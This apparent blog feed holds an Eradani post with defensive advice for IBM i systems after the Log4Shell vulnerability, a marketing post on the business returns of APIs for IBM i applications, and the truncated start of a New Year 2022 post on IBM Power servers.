Keeping Your IBM i Safe in the Face of Attacks Like Log4Shell

The old saying “The Price of Liberty is Eternal Vigilance” can be updated today to read “The Price of Online Access is Eternal Vigilance”. We just got hit over the head with a reminder of the importance of eternal vigilance with the discovery of the log4J Java security vulnerability. For the last several years, millions of applications using Java and the log4j logging component have been vulnerable to attack. Malicious users can use that vulnerability to extract data from targeted systems, load and execute malware on those systems and even completely take over the servers. The vulnerability is so severe and widespread that it has received a rating of 10 on the 1-10 CVSS scale (Common Vulnerability Scoring System) from the Apache Software Foundation.

The good news is the software patches and remediation guides to eliminate this vulnerability are readily available (see links below for a start). But even if you are not a Java user, this problem is an important wakeup call.

In the IBM i world, we have often relied on “security through obscurity” – we think maybe we are safe because we are not huge targets like Microsoft and Unix/Linux. Or, we feel safe because we do not connect our IBM i systems directly to the internet. Unfortunately attacks like log4shell can pierce those safety nets. If your IBM i happens to be on the same network as a machine that is vulnerable and connected to the internet, the log4j vulnerability could be used to discover IBM i credentials and to access the IBM i.

To reduce your risk and keep your systems safe, you need multiple layers of protection. Some of the steps you can take:

Eliminate the use of Basic Authentication (in which user credentials that grant native access to the IBM i are passed in API calls). Replace it with encrypted token authentication.
Add third party authentication via technologies like OAuth.
Restrict APIs and other methods of access to just the minimum number of resources necessary to accomplish assigned tasks.
Add multifactor authentication to all access (including 5250 emulator access).
Be careful when providing the ability for programs on your internal systems to call out to outside systems. Calling out provides an opportunity for a hacker to get malicious code on your machine. For example, the log4shell vulnerability requires the ability to call out to the potential hacker’s system to do its damage.
Set up logging and monitoring of APIs and other kinds of outside access to your systems.
Check out the guides provided by your vendors (eg. Microsoft, Google, IBM, etc. – see below) to learn more about protecting your systems.
Take good care of your security people who have the very difficult (and often thankless) job of keeping your systems safe.

The value provided by the interconnections of our systems is incalculable. It makes our modern way of life possible. Yet, that same interconnectedness is what creates the potential risks we face. As IT professionals, it is critical for us to remain “eternally vigilant” to protect our online liberty (and the precious data of our company and our customers).

To get the latest version of log4j with the security patches: https://logging.apache.org/log4j/2.x/download.html

Microsoft’s log4Shell remediation document: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

The IBM i Rochester lab’s guidance by Jesse Gorzinski: https://techchannel.com/Trends/12/2021/log4shell-part-1

 

 

The post Keeping Your IBM i Safe in the Face of Attacks Like Log4Shell appeared first on Eradani.

Top Five Ways APIs Can (and Will) Transform Your Business:Finding the ROI in API investments

I spoke recently with an IBM i Engineer who had become frustrated with the difficulty she was having in getting her business executives to understand the value of investing in APIs for their IBM i applications. She was looking for help in how to show the business return on investment from APIs. Together, we were able to identify several areas in which APIs would generate significant business value. When she showed the list to the executives, the light bulbs suddenly went on. They started coming to her practically every day with ideas about how to improve the business with APIs.

Much of the value of APIs comes from their ability to make it easy to integrate applications across systems, technologies and between enterprises. Here are some of the top ways APIs are providing IBM i customers with significant business value.

 

Increasing Revenue

By creating simple ways of connecting systems, APIs have helped IBM i users create new channels for generating revenue.

We worked with an insurance company that created a portal to their quoting system that allowed a real estate company to provide real time insurance quotes to customers looking at their properties.
A transportation company API enabled their quoting system making it possible for them to rapidly respond to over a million quote requests per day.
Several of our customers are now listing their products on ecommerce sites like Amazon, eBay and Shopify using APIs to keep inventory and pricing information continuously up-to-date.

Once the APIs were up and running, the ROI became clear based on the increase in revenue coming from these new channels.

IBM i companies that have started doing business via APIs have also found that the rapid response and access to real time data their APIs provide their customers, increases customer loyalty and repeat business which is another source of increased revenue.

 

Reducing Costs

We are working with several IBM i users that are reducing costs by eliminating manual processes from their business workflows using APIs. One company was receiving POs from their customers via email and then manually entering them into their order entry system. Now the POs come in electronically via an API and are automatically entered into the order entry system. The order entry system then returns an acknowledgement to the customer via an API and schedules the picking and packing of the order via yet another API. Another company needed to update inventory and pricing information on their Shopify eCommerce site. They were doing it with a daily file transfer which meant that the inventory and pricing was often out of date. This led to a complex reconciliation process at the end of every day. Now they provide the inventory and data real time via an API. They have completely eliminated the manual effort involved in reconciliation.

API enablement can also help reduce new employee onboarding costs by simplifying operations. We worked with a company that had a very seasonal business. They had to bring on scores of temporary workers to staff their customer service department during their busy season. It took two weeks to train the new workers because they had to navigate through a variety of applications to respond to customer calls. They API enabled each of the back end application so they could present all of the data on a single graphical screen. Now training takes a half a day instead of two weeks. It’s a recurring ROI that dwarfs the investment they made in APIs.

 

Increasing Programmer Productivity

Every IBM i development shop I speak to has way more work in their backlog than they have time to address. Using APIs opens up the world of open source modules for delivering on some of those backlog items. Do you need graphical dashboards for data visualization? There are open source modules for that. Do you want an easy way to print mailing labels, bar codes and QR codes? There are other modules built specifically for that purpose. We were on the phone with a customer recently and they said they had a needed to verify banking (ACH) info before entering it into their system. We did a quick search and in seconds we found several popular open source modules that already do that. When adding a new feature, you no longer need to ask “how do we build this?”, rather you can ask “has someone already built this?”

The ROI for using open source modules comes both from the direct savings in programming costs and also from the benefit of getting valuable features more quickly.

 

Simplify Staffing

By opening up your RPG and COBOL applications to APIs, you can start extending those applications using new languages like Java, JavaScript, Python, PHP, C# and others. There are millions of skilled programmers available who work in those languages. Meanwhile, universities, tech schools and online academies are turning out more every day. You no longer need to worry about whether you will be able to find people with the skills you need to maintain your applications. The ROI of ensuring a strong pipeline of engineers to maintain your applications can be that you will not need to go through an expensive an highly risky rip and replace effort if you can no longer find the people you need.

 

Future Proofing Your Business

When you have an API layer around your applications, you are free to add whatever technology emerges to your application stack. We worked with one company that has provided mobile devices to their salespeople and to their warehouse workers so they have real time, anywhere, anytime online access to their applications. Another is transmitting RFID code information from shipping containers and trailers to their IBM i so they know the location of those assets at all times. Other customers are connecting their IBM i applications to machine learning engines like IBM Watson and Google’s TensorFlow. A well-designed API infrastructure will allow you to stay out in front of the technology curve. The ROI of being able to keep up with technological change is practically unlimited.

These are just a few of the ways IBM i users are transforming their businesses with APIs. In each case, the returns on investment have been significant. We consistently see that once a company begins to use APIs, they rapidly expand their API inventory as more and more opportunities appear. If you or your executives would like to discuss the potential of APIs for your IBM i environment with experts who spend all of their time working with IBM i APIs, contact us at [email protected] or through our website at www.eradani.com. We look forward to speaking with you!

 

The post Top Five Ways APIs Can (and Will) Transform Your Business:<br>Finding the ROI in API investments appeared first on Eradani.

Happy New Year, 2022!

Last year was blighted by the COVID pandemic again. I am sure all of us are glad to see another year dominated by the virus behind us. I am keeping my fingers crossed that we might start returning to a more “normal” life this year.

Despite all the restrictions upon our working lives IBM still managed to bring us a new Power server series, Power 10, starting with the E1080 server. As well as two Technology Refreshes. You can read about it all on this website.

Every year I look to see what were the most read posts of the year. These were:

Read more »

Verified by MonsterInsights